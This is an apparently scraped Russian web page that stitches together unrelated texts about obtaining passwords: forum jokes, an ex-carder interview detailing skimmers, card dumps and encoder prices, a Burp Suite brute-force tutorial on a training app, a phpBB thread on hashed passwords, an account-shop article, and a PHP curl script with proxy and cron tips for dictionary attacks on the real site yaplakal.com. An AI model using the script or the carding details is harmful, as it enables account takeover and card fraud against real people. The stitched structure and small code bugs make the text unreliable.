Как найти пароль на форуме

Не сообщив в отдел «К» о готовящемся преступлении, мы тут получаемся соучастниками.

Ты когда на этот форум заходишь, ты свой реальный IP провайдера затираешь, или у сотрудников отдела «К» сегодня праздник?

Думается мне, что данный индивидуум даже понятия не имеет, что есть отдел «К» и кто они такие)))
Ведь он «великий» хакер и ему ничего не страшно, хотя он так же не имеет верного представления о том, кто такие хакеры на самом деле (в рамках терминологии, как минимум):).

Новость о начале судебных слушаний по делу «К» подняла волну обсуждений среди граждан, знакомых с термином «кардинг» — хищение с помощью поддельных банковских карточек. Один из них, некогда обвиняемый в кардинге, на условиях анонимности поделился с «Белгазетой» методами работы в управлении «К».

«Прежнего доверия не будет»

— Какими познаниями в сфере высоких технологий обладали белорусские правоохранители в начале XXI века, когда начинались первые уголовные дела?

— Крайне низкими. Поэтому работа была построена на моральном давлении и поиске слабых мест у подозреваемых. Испуганные кардеры сдавали друг друга, надеясь избежать уголовной ответственности: им обещали покровительство. Серьезных доказательств у правоохранителей не было, они видели только то, что лежало на поверхности. К примеру, обвинение могли предъявить лишь на основании полученной из-за рубежа посылки как похищенной «из неустановленного интернет-магазина». Доказать конкретный факт хищения крайне сложно: банки на сотрудничество с правоохранителями идут неохотно, боятся за репутацию, особенно в свете последних событий. Управление «К» опозорилось, нанеся всему ведомству огромный ущерб. Не удивлюсь, если прежнего доверия к нему уже не будет. Кардерское сообщество в шоке от подобной новости.

— Как вели себя оперативники с подозреваемыми в хищении с использованием компьютерных технологий?

— Как я уже сказал, использовали психологическое давление. До физического насилия дело не доходило, но вот допрос мог продолжаться сутки. Следователи сменяли друг друга, угрожали засунуть в «пресс-хату» Володарки. Я боялся этих угроз как огня.

— Соблазн похитить деньги с банковской карточки гражданина иной страны велик…

— Говоря о сотрудниках управления «К», не могу не признать, что им крайне сложно: эти люди с большими возможностями, которые хоть что-то понимают в соблюдении закона в сфере высоких технологий. Мало кто способен проконтролировать их действия. Привлечение Новика и Миклашевича к уголовной ответственности — шок. Предвижу волну обсуждений на кардерских сайтах: о том, что Миклашевичу тоже предъявлено обвинение, известно не было. Удивительно, что это уголовное дело вообще возбудили: милиционеры такого уровня могут совершать хищения безнаказанно.

— Чем интересовались правоохранители, занятые расследованием вашего уголовного дела?

— Сведениями о продавцах дампов (информация о держателе карты на магнитной полосе. — «БелГазета») и PIN-кодов, а также скимеров — накладок на щель в банкомате для банковской карточки и панели для введения информации. Продаются эти устройства под заказ, стоят около 7-8 тыс. евро и окупаются за несколько часов работы. После прохождения через банкомат со скимером пластиковой карточки на определенный номер SIM-карты приходит SMS с полной информацией о карте и ее владельце. Через интернет такую информацию сегодня искать бесполезно: никто не продает деньги за деньги. Один комплект дампа и PIN-кода стоит около 400 евро, деньги требуют вперед, но не выполняют своих обязательств.

— Применяют ли скимеры в Беларуси?

Редко. На матч со сборной Беларуси приезжали англичане, весь район стадиона «Динамо» и гостиниц обвешали скимерами. Белорусам же бояться нечего: кардеры считают неэтичным брать у своих, к тому же денег на картах белорусских граждан немного, я видел куда большие суммы.

— Насколько серьезной информацией обладали сотрудники управления «К»?

— Достаточно серьезной, учитывая, что получали ее у серьезных кардеров. Известна история, как после ареста одного парня, обвиняемого в кардинге, в распоряжении правоохранителей оказалась его SIM-карта, на которую долгое время шли SMS-сообщения с данными о пластиковых картах.

— Насколько сложным является производство поддельных банковских пластиковых карточек? Дорогое ли при этом используется оборудование?

— Аппарат энкодер MSR-206, предназначенный для записи информации на магнитную полосу пластиковой карты, стоит около 700$ и предлагается в свободной продаже в России. Выглядит он как коробка, выполняет функцию нанесения на карточку магнитной полосы. Но в покупке энкодеров у правоохранителей необходимости нет — их используют практически все кардеры. Никто не мешал милиционерам использовать изъятые энкодеры, карточки и дампы в своих целях.

— Может ли милиционер совершать преступления в сфере высоких технологий в одиночку или для этого требуются помощники?

— Помощники нужны, поскольку ни один умный милиционер не будет светиться перед видеокамерой у банкомата. Ни один кардер не работает в одиночку, обычно обязанности распределяются между несколькими людьми: поиск информации, запись ее на карточку, снятие денег.

— Почему в обвинении по «Делу «К» присутствует большое количество неудавшихся транзакций — карточки оказались бракованными?

— Ряд зарубежных банков и платежных систем избегает контактов с белорусскими, а значит, ряд карточек наши терминалы просто не читали. Не исключено, что пока краденый дамп добрался до конечного «клиента», карт-счет заблокировали. Поэтому обвиняемые ездили в Россию — банкоматы этой страны не отключаются от международной биллинг-системы.

— Была ли у Новика возможность шантажировать подозреваемых и, если да, насколько действенной была «крыша» МВД, предлагаемая, исходя из обвинения, в обмен на сотрудничество?

— Компромат на человека всегда можно найти, так что повод для шантажа найдется. «Крыша» работает: контролировать действия сотрудников управления «К» действительно сложно. И все же верить милиционерам я бы не стал — они не считают обвиняемых за людей, всегда могут обмануть.

— Новик питал интерес к получению информации от граждан, осведомленных о совершении преступлений в сфере высоких технологий. Какие отношения складываются между милиционером и информатором?

— Тесные. Милиционеры любыми путями стремятся выйти через информатора на людей, совершающих преступления, поскольку интернет не дает этой возможности — цепочки прокси-серверов нажедно защищают личность.

— Что возразите милиционеру, утверждающему, будто стол жертвой оговора информаторов, ранее судимых?

— Кардеры отдают отчет в больших возможностях правоохранителей, поэтому стараются не вступать с ними в полемику и что-то доказывать. Не думаю, что кто-то из кардеров пошел на столь рискованное мероприятие — оговор, только чтобы убрать со своих мест руководителей управления «К».
«Блаженство когда ты ощущаешь фалос в анусе врага» — Б. Диголо

Как подобрать пароль к аккаунту/странице/сайту

Время на прочтение
2 мин

Количество просмотров 7.7K


Туториал


Recovery mode


Перевод

Друзья, всех приветствую!

В этой статье мы поговорим о том, как подбирать пароли к учетным записям, сайтам, страницам, аккаунтам с помощью Burp Suite.

Аутентификация лежит в основе защиты приложения от несанкционированного доступа. Если злоумышленнику удастся нарушить функцию аутентификации приложения, то он сможет завладеть всем приложением.

В следующем примере демонстрируется техника обхода аутентификации с использованием имитированной страницы входа в систему из учебного инструмента «Mutillidae». Версия «Mutillidae», которую мы используем, взята из проекта OWASP «Broken Web Application Project». Скачать проект BWAP вы можете здесь.

Во-первых, убедитесь, что Burp Suite правильно настроен в вашем браузере. Во вкладке Burp Proxy убедитесь, что «Перехват выключен» («Intercept is off») и посетите страницу входа (login page) в WEB-приложение, которое вы тестируете в вашем браузере.

Вернитесь в Burp Suite. На вкладке Proxy «Intercept» убедитесь, что «Intercept is on».

В браузере введите произвольные данные на странице входа и отправьте запрос.

Перехваченный запрос можно просмотреть на вкладке Proxy «Intercept». Щелкните правой кнопкой мыши на запросе, чтобы вызвать контекстное меню. Затем нажмите «Send to Intruder».

Перейдите на вкладку Intruder «Positions». Очистите предварительно установленные позиции, используя кнопку «Clear» справа от редактора запросов. Добавьте значения параметров «username» и «password» в качестве позиций, выделив их и используя кнопку «Add». Измените атаку на «Cluster bomb», используя выпадающее меню «Attack type».

Перейдите на вкладку «Payloads». В настройках «Payload sets» убедитесь, что «Payload set» равен «1», а «Payload type» установлен на «Simple list». В настройках «Payload options» введите несколько возможных имен пользователей. Вы можете сделать это вручную или использовать предварительно установленный список username.

Затем в настройках «Payload Sets» измените значение параметра «Payload» на «2». В настройках «Payload options» введите несколько возможных паролей. Вы можете сделать это так же вручную или использовать предварительно установленный список паролей. Далее нажмите кнопку «Начать атаку».

В окне «Intruder attack» вы можете сортировать результаты, используя заголовки столбцов. В данном примере сортировка производится по длине («Content-Length») и по статусу.

Теперь таблица предоставляет нам некоторые интересные результаты для дальнейшего исследования. Просматривая ответ в окне атаки, мы видим, что запрос 118 вошел в систему под именем «admin».

Чтобы подтвердить успешность «брутфорса», используйте имя пользователя и пароль на странице входа в веб-приложение.

В некоторых случаях перебор на странице входа в систему может привести к тому, что приложение заблокирует учетную запись пользователя. Это может быть связано с политикой блокировки, основанной на определенном количестве неудачных попыток входа в систему и т.д. Хотя такая политика разработана для защиты учетной записи, она может привести к дополнительным уязвимостям. Злоумышленник может заблокировать несколько учетных записей, лишив пользователей доступа к ним. Кроме того, заблокированная учетная запись может вызвать изменения в «поведении» web-приложения, и это поведение должно быть изучено и потенциально использовано.

Всем спасибо за внимание!

Подписывайтесь на меня в соц. сетях, буду всем рад!

Уважаемые пользователи!
Напоминаем, что с 7 ноября 2020 года phpBB Group прекратила выпуск обновлений для phpBB версии 3.2.
С учетом этого, рекомендуется обновить конференции до версии 3.3.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до отдельного объявления.

Как узнать пароли пользователей моего форума?

kuparos

phpBB 1.0.0
Сообщения: 7
Стаж: 16 лет 6 месяцев

Как узнать пароли пользователей моего форума?

Как узнать пароли пользователей моего форума?
У меня на сайте в данный момент нет регистрации нормальной, т.е., я использовал в качестве регистрации на сайте регистрацию в форуме. А вот теперь у меня появилась нормальная регистрация на сайте, но не на основе SQL. У меня порядка 60 зарегистрировавшихся пользователей в форуме. Как бы мне узнать их пароли, чтобы не просить их заново регистрироватья на сайте. Я бы лучше вручную их забил в новую базу, чтобы их не напрягать (новая база не на SQL, т.е., нельзя просто перенести базу). Как узнать пароли пользователей моего форума? Пожалуйста, помогите советом!!! Можно сюда, можно на почту kuparos@mail.ru Заранее спасибо!

Midian

Сообщение

Midian » 14.11.2006 13:21

Самый верный способ — у них спросить. Ибо если бы админ любого форума на котором бываю получил контроль над моим аккаунтом, мне бы это не понравилось, знаете-ли… Администраторская этика, если угодно, должна же существовать…

Аватара пользователя

Siava

Поддержка
Поддержка
Сообщения: 5147
Стаж: 18 лет 4 месяца
Откуда: Питер
Благодарил (а): 175 раз
Поблагодарили: 751 раз
Контактная информация:

Сообщение

Siava » 14.11.2006 16:42

kuparos
Если в новой базе/скрипте пароли шифруются по алгоритму md5, то туда можно перенести пароли пользователей из базы форума, так как они там зашифрованы md5 и всё будет ок.

Еще одно нарушение правил и будете забанены. © Mr. Anderson
Ты очистил кеш? © Sheer
https://siava.ru (phpbb

2.0.x

3.5.x)

kuparos

phpBB 1.0.0
Сообщения: 7
Стаж: 16 лет 6 месяцев

Сообщение

kuparos » 14.11.2006 17:25

Понимаете, посетители думали, что регистрируются на всем сайте, а не просто на форуме. Я так это представил для них поскольку не имел нормальной регистрации. Решил — наберу постоянных посетителей, а потом перепишу их вручную в новую базу, когда регистрацию сделую. Теперь будет несколько необоснованно и нетактично с моей стороны просить их заново перерегистрироваться. Как быть? Можно же эти пароли расшифровать как-то? Как? Подскажите!

Аватара пользователя

crash

Former team member
Сообщения: 6517
Стаж: 18 лет 10 месяцев
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение

crash » 14.11.2006 17:28

kuparos писал(а):Можно же эти пароли расшифровать как-то?

прочитайте про md5 и потом решайте, а надо вам этот гемморой или нет

Midian

Сообщение

Midian » 14.11.2006 17:29

kuparos
Ну, нет ничего зазорного в том, что попросить их перерегистрироваться, или прислать свои пароли с последующей возможностью анонимной замены. Сослаться, например, на злых хаккеров, от атаки которых вы успешно отбились, но которые учинили програмный сбой… Например ;)

Аватара пользователя

rxu

phpBB Guru
phpBB Guru
Сообщения: 16027
Стаж: 17 лет
Откуда: Красноярск
Благодарил (а): 502 раза
Поблагодарили: 1991 раз
Контактная информация:

Сообщение

rxu » 14.11.2006 17:33

kuparos писал(а):Можно же эти пароли расшифровать как-то?

Нет.

Изображение

Аватара пользователя

crash

Former team member
Сообщения: 6517
Стаж: 18 лет 10 месяцев
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение

crash » 14.11.2006 17:36

rxu писал(а):Нет.

ну не так категорично

kuparos

phpBB 1.0.0
Сообщения: 7
Стаж: 16 лет 6 месяцев

Сообщение

kuparos » 14.11.2006 17:40

Как-то странно. Вроде бы я администратор и это условно «моя клиентская база» в виде лояльных посетителей, а в то же время, не имею возможности этими данными воспользоваться в полной мере.

Midian

Сообщение

Midian » 14.11.2006 17:50

kuparos писал(а):Как-то странно. Вроде бы я администратор и это условно «моя клиентская база» в виде лояльных посетителей, а в то же время, не имею возможности этими данными воспользоваться в полной мере.

И слава Богу, что не имеете. . . И своим лояльным посетителям на своём публичном форуме не говорите, что они — клиенты ;) Разбегутся )))
Представьте, что вашы ЛС читает кто-то другой, а там у Вас секретная информация, к примеру, или личная…

Вы можете сменить им пароли на какие угодно, в принципе, а они затем воспользовавшись вспоминалкой получат доступ к форуму и сайту.

kuparos

phpBB 1.0.0
Сообщения: 7
Стаж: 16 лет 6 месяцев

Сообщение

kuparos » 14.11.2006 17:54

Спасибо за последнюю идею. Так, наверное, ещё можно поступить. Напоминалка их не сильно отпугнет? Не окажется непреодалимой трудностью для некоторых?

Kastaneda

Former team member
Сообщения: 702
Стаж: 18 лет 7 месяцев
Поблагодарили: 4 раза

Сообщение

Kastaneda » 14.11.2006 17:57

А толку от напоминалки? Ведь новый пароль то им придёт от форума, а не от сайта, который на другой базе.

Аватара пользователя

rxu

phpBB Guru
phpBB Guru
Сообщения: 16027
Стаж: 17 лет
Откуда: Красноярск
Благодарил (а): 502 раза
Поблагодарили: 1991 раз
Контактная информация:

Сообщение

rxu » 14.11.2006 17:59

А в чем, собственно, проблема? Вы хотите хранить пароли в открытом виде? Что мешает воспользоваться тем же md5 на сайте?

Изображение

Midian

Сообщение

Midian » 14.11.2006 18:03

Kastaneda писал(а):А толку от напоминалки? Ведь новый пароль то им придёт от форума, а не от сайта, который на другой базе

Ну, насколько я понял, эта проблема у топикстартера (слово то какое) решена, и пароль от форума будет совпадать с паролем от остальных сервисов сайта…

kuparos писал(а):Напоминалка их не сильно отпугнет?

Ну, вопросы то у них появятся, что с паролями случилось и почему старые не валидны…

Как узнать пароль сохраненный в браузере?

Восстанавливаем забытый парольМногие активные пользователи интернета каждый день регистрируются в новых сервисах, поэтому частые вопросы о способах восстановления своего пароля через браузер возникают довольно часто.

Несмотря на то, что многие используют один пароль сразу на несколько сервисов (что категорически не рекомендуется по соображениям безопасности аккаунтов), людям все равно свойственно забывать различную информацию.

В данной статье подробно ознакомимся с ответами на вопрос «как узнать забытый пароль», если Вы не имеет доступа к логину или почте.

Купить сейчас

Мы 100% надежный магазин аккаунтов!

  • Отправляем аккаунты всего за 5 секунд на ваш e-mail адрес!
  • Аккаунты можно скачать в личном кабинете, на почте без регистрации или сразу после оплаты!
  • Мы автоматически создаем личный кабинет с историей всех ваших заказов
  • Большое время на проверку товара до 1-24 часа (примечание у вкладок)
  • У нас можно найти аккаунты любой социальной сети и почтовой службы, сервиса, форума
  • Наши аккаунты стабильно работают на большинстве видов Proxy

Большинство современных интернет-браузеров типа «Яндекс», «Гугл Хром» и «Мозилла» имеют в своем функционале возможность запоминания паролей, поэтому эту фишку можно использовать как метод для восстановления забытого пароля.

Если же Вы наоборот желаете включить функцию запоминания паролей, то перейдите в раздел настроек своего браузера и включите данную возможность.
Разберем процесс определения сохраненного пароля на примере браузера «Яндекс»:

  1. Переходим во вкладку «Настройки»

    Настройки браузера Яндекс

  2. Для быстрого поиска раздела с информацией рекомендуем в поиске настроек ввести «пароли»

    Сохраненные пароли

  3. После окончания поиска появится вкладка «Сохраненные пароли», где находятся все данные о ранее вводимых авторизационных сведениях.

Таким образом, ответ на вопрос как узнать пароль если он сохранен полностью раскрыт на странице восстановления доступа.

Если при использовании данного метода возникли трудности, рекомендуем ознакомиться с обучающими видеороликами по теме на видеохостинге YouTube, где наглядно продемонстрированы перечисленные шаги определения сохраненного логина.

Как узнать пароль если забыл логин?

Если же Вы не имеет доступ к логину аккаунта, то единственным способом авторизации в личном кабинете или почте будет восстановление пароля. В большинстве случаев эта процедура осуществляется с помощью ранее прикрепленного почтового ящика.

На странице входа в аккаунт всегда имеется раздел с восстановлением доступа. В некоторых случаях открыть доступ к личному кабинету можно через мобильный телефон.

Более подробная информация о восстановлении логина размещена на странице Яндекса

Здесь же есть основные моменты, благодаря которым можно служба поддержки может найти утерянный логин и предоставить его Вам.

На примере браузера «Яндекс» можно понять, по каким принципам происходит восстановление данных для авторизации в личном кабинете.

Инструкция яндекса про пароли

Если вопрос «как узнать пароль сохраненный в браузере?» решается для пользователей достаточно легко, то процесс восстановления доступа без логина может занять намного больше времени, поэтому иногда проще создать новый личный кабинет.

Важно! Для избегания ситуаций с восстановлением доступа, при регистрации новых «учеток» рекомендуем делать скриншоты либо пометки в «записки» смартфона.

Как узнать пароль если забыл почту?

Если же Вы регистрировали свой кабинет с помощью почтового ящика, доступа к которому у Вас сейчас нет, то в таком случае рекомендуем выполнить следующие шаги:

  • Восстановить доступ с помощью ввода защитного кода (данный код можно получить на номер мобильного телефона, указанного при регистрации)
  • Ответить на секретный вопрос и сменить логин
  • Связаться с администратором и предоставить ему все необходимые данные

Если для защиты своей почты Вы использовали секретный вопрос, ответ на который Вы сейчас не помните, выполните следующие действия:

  • Смените раскладку на клавиатуре
  • Включите или выключите «Caps Lock»
  • Используйте разные варианты транслитерации

После нескольких неудачных попыток Вам будет предложено связаться со службой поддержки, сотрудники которой более подробно объяснят, как узнать пароль и вернуть доступ к личному кабинету.

Как узнать забытый пароль на телефоне?

Так как сейчас большинство пользователей интернета в качестве браузера используют мобильные клиенты, актуален вопрос «как узнать забытый пароль на телефоне?».

В зависимости от типа мобильного браузера (а также от типа операционной системы), процесс восстановления забытого пароля может отличаться, однако основные этапы практически идентичны.

Разберем основные способы определения паролей на телефоне:

  1. Мобильные версии браузеров также имеют функцию сохранения паролей, поэтому если она была включена в момент Вашей авторизации, то восстановить доступ не составит труда: 1) для начала перейдите в настройке браузера

    Настройки браузера на телефоне

    2) далее переместитесь в раздел «пароли», где во вкладке «список паролей» Вы можете найти нужные авторизационные данные

    Сохраненные пароли на телефоне

  2. Если Вы используете браузер под учетной записью, то для доступа к списку данных Вам придется повторить ввод пароля от аккаунта.

    Важно! Функция автосохранения паролей работает только на тех сайтах и сервисах, где Вы разрешаете использовать данную возможность. В остальных случаях функция не запускается, что делает невозможным восстановление данных через браузер.

Данный способ подходит только для ответа на вопрос как узнать сохраненный пароль, в то время как без функции автосохранения получить доступ к забытому аккаунту будет намного сложнее.

Первым делом рекомендуем использовать стандартную форму восстановления, которая может помочь пользователям, которые прикрепляют к учетной записи активный почтовый ящик или действующий номер телефона.

Важно! В крайнем случае, когда восстановить аккаунт не получается ни одним из перечисленных способов, а заводить новую учетную запись не требуется, обратитесь за помощью в офис разработчика сервиса, либо подготовьте заказное письмо со всеми необходимыми данными.

Шаблон подобного письма можно найти на официальных сайтах сервиса, в разделе «безопасность» и «поддержка».

Купить сейчас

Узнайте как правильно оформить заказ на нашем сайте!

Похожие материалы по данной теме

  1. Узнать свой IP адрес: сервисы проверки IP

    IP-адрес – это цифровой идентификатор сети, он создан для того, чтобы устройства могли опознать друг друга внутри сети и обменяться информацией.

    По сути, это аналог любого паспорта человека – эта…

    читать подробнее

  2. Как быстро восстановить пароль от аккаунта Gmail?

    В данной статье мы поговорим о почтовой службе Gmail.

    Служба Gmail — это почтовый сервис от Google, который очень популярен среди русскоязычного населения России и за рубежом.

    читать подробнее

  3. Какой пароль придумать для аккаунта?

    В наше время существует реальная угроза потерять свой пароль от личного аккаунта в социальных сетях или от почты.

    Как правило, от потери пароля не спасают даже различные антивирусы и…

    читать подробнее

  4. Как установить QIP на компьютер?

    В данной статье хотелось бы подробно рассказать о всех особенностях аккаунтов сайта QIP. Как многие знают — существует и сайт QIP.RU, и сама программа (мессенджер) — QIP.

    В большинстве случаев…

    читать подробнее

  5. Украли аккаунт Вконтакте, что делать?

    Социальная сеть «Вконтакте» — популярнейшая в России на данный момент, поэтому логично, что количество новых пользователей ежедневно только увеличивается.

    Так как «Вконтакте» постоянно…

    читать подробнее

  6. Как восстановить пароль от LiveInternet.ru?

    Бывает и так, что вы пытаетесь авторизоваться в системе LiveInternet, и у вас не получается. Либо вы просто забыли пароль от аккаунта LiveInternet.

    Что делать в этом случае?

    Чтобы…

    читать подробнее

  7. Как подтвердить номер в аккаунте Авито и привязать к телефону?

    Авито — это очень удобный интернет сервис с возможностью размещать коммерческие объявления о продаже товаров или предоставлении услуг.

    Он отлично подходит как для отдельных граждан, так и для…

    читать подробнее

  8. Как закрыть (скрыть) аккаунт в instagram?

    В Инстаграм пользователи приходят за просмотром красивых фотографий.

    Однако платформа при этом не забывает о правах человека на неприкосновенность частной зоны. В Инстаграме каждый…

    читать подробнее

  9. Как настроить прокси в Яндекс Браузере?

    Ежегодно в список запретов от Роскомнадзора входит все большее количество сайтов и интернет-порталов, поэтому у многих пользователей возникают проблемы со входом на подобные страницы.

    Если…

    читать подробнее

  10. Как пользоваться ICQ без установки программы?

    Сервис мгновенного обмена сообщениями ICQ появился более десяти лет назад.

    Сейчас популярность данного мессенджера не столь велика, как, например, еще 5-7 лет назад, однако для быстрого…

    читать подробнее

Как узнать пароль пользователя на сайте на примере япа

Внимание! Автор статьи не несет никакой ответственности за действия читателей и предупреждает, что неправомерный доступ к информации незаконен! Данная статья выложена исключительно с целью ознакомления с одним из способов взлома веб сайтов и не может служить руководством к реальному действию. Материал предназначен для начинающих веб разработчиков, чтобы они могли примерно представлять себе мысли взломщика хакера и успешно противостоять взлому: создавать эффективную защиту от подбора паролей.

Преподаватели в университете говорят, что лучше всего учиться на примере. Запоминание и осмысление информации гораздо лучше происходит, если сухая теория разбавляется живой демонстрацией. Именно так мы и поступим в данном случае: разберем алгоритм доступа к паролю пользователя на примере сайта Яплакаль. В своем примере мне понадобится следующее:

  • Хостинг с возможностью исходящих соединений;
  • язык PHP;
  • поддержка Curl с отправкой POST;
  • файл с паролями (или словарь);
  • Cron;
  • подключение и парсинг прокси (опционально).

Примечание: полное решение задачи по взлому сайта (с подробностями) я выкладывать не буду – специалист сам разберется, а для начинающих хакеров есть другие ресурсы. Или услуги специалиста :)

Исследуем форму авторизации

Предположим, что мы определили цель – имеем логин пользователя. Нам требуется узнать, с помощью какого пароля он заходит на сайт. Если мы посмотрим на главную страницу сайта (откроем её исходный код), то увидим, что форма авторизации отсылает данные POST-запроса на страницу с адресом «//www.yaplakal.com/act/Login/CODE/01/». При этом, помимо двух основных полей (логин и пароль) отсылаются еще скрытые поля, но, скажу сразу – они не имеют значения для подбора пароля.

Получаем и обрабатываем страницу

Создадим функцию получения веб-страниц с помощью Curl — get_page:

function get_page($url, $uagent, $us, $pas )
{
  $ch = curl_init($url);

  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   
  curl_setopt($ch, CURLOPT_HEADER, 0);           
  curl_setopt($ch, CURLOPT_ENCODING, "");       
  curl_setopt($ch, CURLOPT_USERAGENT, $uagent);  
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120); 
  curl_setopt($ch, CURLOPT_TIMEOUT, 120);        
  curl_setopt($ch, CURLOPT_MAXREDIRS, 10);       
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, "UserName=".$us."&PassWord=".$pas);
 
  $content = curl_exec( $ch );
  $err     = curl_errno( $ch );
  $errmsg  = curl_error( $ch );
  $header  = curl_getinfo( $ch );
  curl_close( $ch );

  $header['errno']   = $err;
  $header['errmsg']  = $errmsg;
  $header['content'] = $content;
  return $header;
}

Ничего необычного вы здесь не увидите. Функция принимает на вход 4 параметра (адрес, юзер агент, логин и пароль), а на выходе выдает страницу. Пожалуй, советую обратить внимание только на строки 12 и 13: в них мы определяем, что не просто устанавливаем исходящее соединение, а еще и добавляем в curl параметр Post. Получаемую страницу мы обрабатываем с помощью такой процедуры:

$addr = "http://www.yaplakal.com/act/Login/CODE/01/";
$lines = file('http://site.com/pass.txt');
$us = "логин";
$uagent ="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";

for ($i=0;$i<1000;$i++) {
$pas= rtrim(str_replace("n", "", $lines[$i])); //убираем знак перехода и возможный пробел сначала
	
$result = get_web_page($addr, $uagent, $us, $pas);
if (($result['errno'] != 0 )||($result['http_code'] != 200))
    {
	echo $result['errmsg'];
	}
else
	{
	$page = $result['content'];

if (substr_count($page, "Неверный пароль")<1)	//проверяем сколько раз встречается строка в странице
{
echo "Пароль:".$pas;
die();	
}
}
}

Здесь все до безобразия просто: читаем файл с паролями в массив и пробуем. 1000 раз. Если в ответ выдается страница, в которой отсутствует фраза «Неверный пароль», то прекращаем работу скрипта и выводим на экран подошедший пароль.

Файл с паролями

Интересный момент: а что это за файл pass.txt? Это файл с паролями. Для брутфорса существуют специальные словари, с помощью которых хакеры подбирают пароли. Зачем они нужны? Дело в том, что действую просто перебором, мы даже в самом маленьком пароле для япа (минимальная длина – 8 символов) получаем 256289062500000000 вариантов. Многовато, не правда ли?

Словари с паролями можно составить и самостоятельно. Например, в одной своей статье я показывал самые популярные пароли для mail.ru – можно взять их – в
файле почти 200 тысяч паролей.

Однако, стоит отметить, что перед взломщиком здесь встает проблема: за один раз даже 200 тысяч паролей не получится обработать. Во-первых, на каждом хостинге стоит ограниченное время исполнения php-скрипта – ресурсы сервера ограничены. Кроме этого, на каждом уважающем себя сайте стоит хотя бы минимальная защита от такого грубого брутфорса. Например, интернет магазины часто ставят ограничение на количество подключающихся ip в сутки – 2000 запросов хватает обычному пользователю, а не занимающемуся парсингом сайта.

Прокси

Второе затруднение мы можем обойти с помощью прокси. Например, можно брать бесплатные прокси тут. С помощью того же curl просто парсить эту страничку и подставлять полученный ip и порт. Только придется затем немного доработать нашу функцию get_page – добавить пару строк:

curl_setopt ($ch, CURLOPT_PROXY, "202.153.130.214:80"); 
curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);

В первой адрес и порт прокси, а во второй указываем тип.

Однако, бесплатные прокси не панацея – нередко, даже с уже опробованными браузер может выдать вот такое:

Да и первая проблема никуда не делась – время работы скрипта не уменьшилось. Обойти эту проблему можно с помощью запуска скрипта по расписанию.

Cron

На всех платных хостингах, в том числе и на моем, есть возможность запускать скрипты по расписанию. Зададим, например, выполнение нашего скрипта раз в час:

Сама строка сценария (пример):

/usr/bin/php5.6 /home/u/up/upread.ru/cron.php

Тут «/usr/bin/php5.6» — это интерпретатор, «/home/u/up/»— путь до домашней директории (вам надо будет определить его самостоятельно на своем хостинге), а «upread.ru/cron.php» — это уже непосредственно скрипт, который будет подбирать пароли.

Небольшие доработки

Наш скрипт подбора требуется немного доработать. Надо сделать так, чтобы данные куда-то записывались – или в базу данных или в файл. Это несложно, поэтому я пропускаю подробности. Алгоритм тут такой: в конце работы скрип, когда закончит проверять очередную партию паролей, просто записывает номер строки последнего – а файл cron.php через определенное время начинает уже со следующей по порядку.

Итог

Для сайта пациента (яп) параметры на данный момент оказались такими: сайт выдерживает до 1000 запросов со одного ip каждые полчаса. То есть, по 2000 в час или 48 тысяч в сутки. На самом деле это неплохие параметры – обычно защита гораздо строже. Это значит, что наш файл с самыми распространенными паролями от mail.ru проверится полностью меньше, чем за 4 суток. А если взять файл с 16 миллионами паролей? На это с помощью одного потока уйдет более 300-х суток! Однако, так как это выполняет сервер, то вам то какая разница? Плюс подключить десяток прокси – и через месяц с большой вероятностью у вас будет пароль от нужного аккаунта.

Дополнение

Стоит отметить, что взломщики аккаунтов (подборщики паролей) нередко действуют по другой схеме: они парсят с сайта имена (логины) пользователей и с помощью самостоятельно составленного словаря паролей подбирают к ним. То есть атака идет на кого-то конкретного, а «широким фронтом».

В заключение хочу еще раз повторить, что информация предоставлена исключительно для законопослушных веб-мастеров и пользователей, заботящихся о собственной безопасности. Если у вас есть какие-либо вопросы, то я с удовольствием на них отвечу – за небольшое вознаграждение. Напишу любую программу или создам сайт.


Автор этого материала — я — Пахолков Юрий. Я оказываю услуги по написанию программ на языках Java, C++, C# (а также консультирую по ним) и созданию сайтов. Работаю с сайтами на CMS OpenCart, WordPress, ModX и самописными. Кроме этого, работаю напрямую с JavaScript, PHP, CSS, HTML — то есть могу доработать ваш сайт или помочь с веб-программированием. Пишите сюда.

тегистатьи IT, php, curl, пароли, POST-запрос

Понравилась статья? Поделить с друзьями:
  • Win32kbase sys windows 10 как исправить ошибку
  • Как найти массу в полете
  • Как найти свою родословную алтайский край
  • Как найти usb устройства в системе
  • Найти как нарисовать цилиндр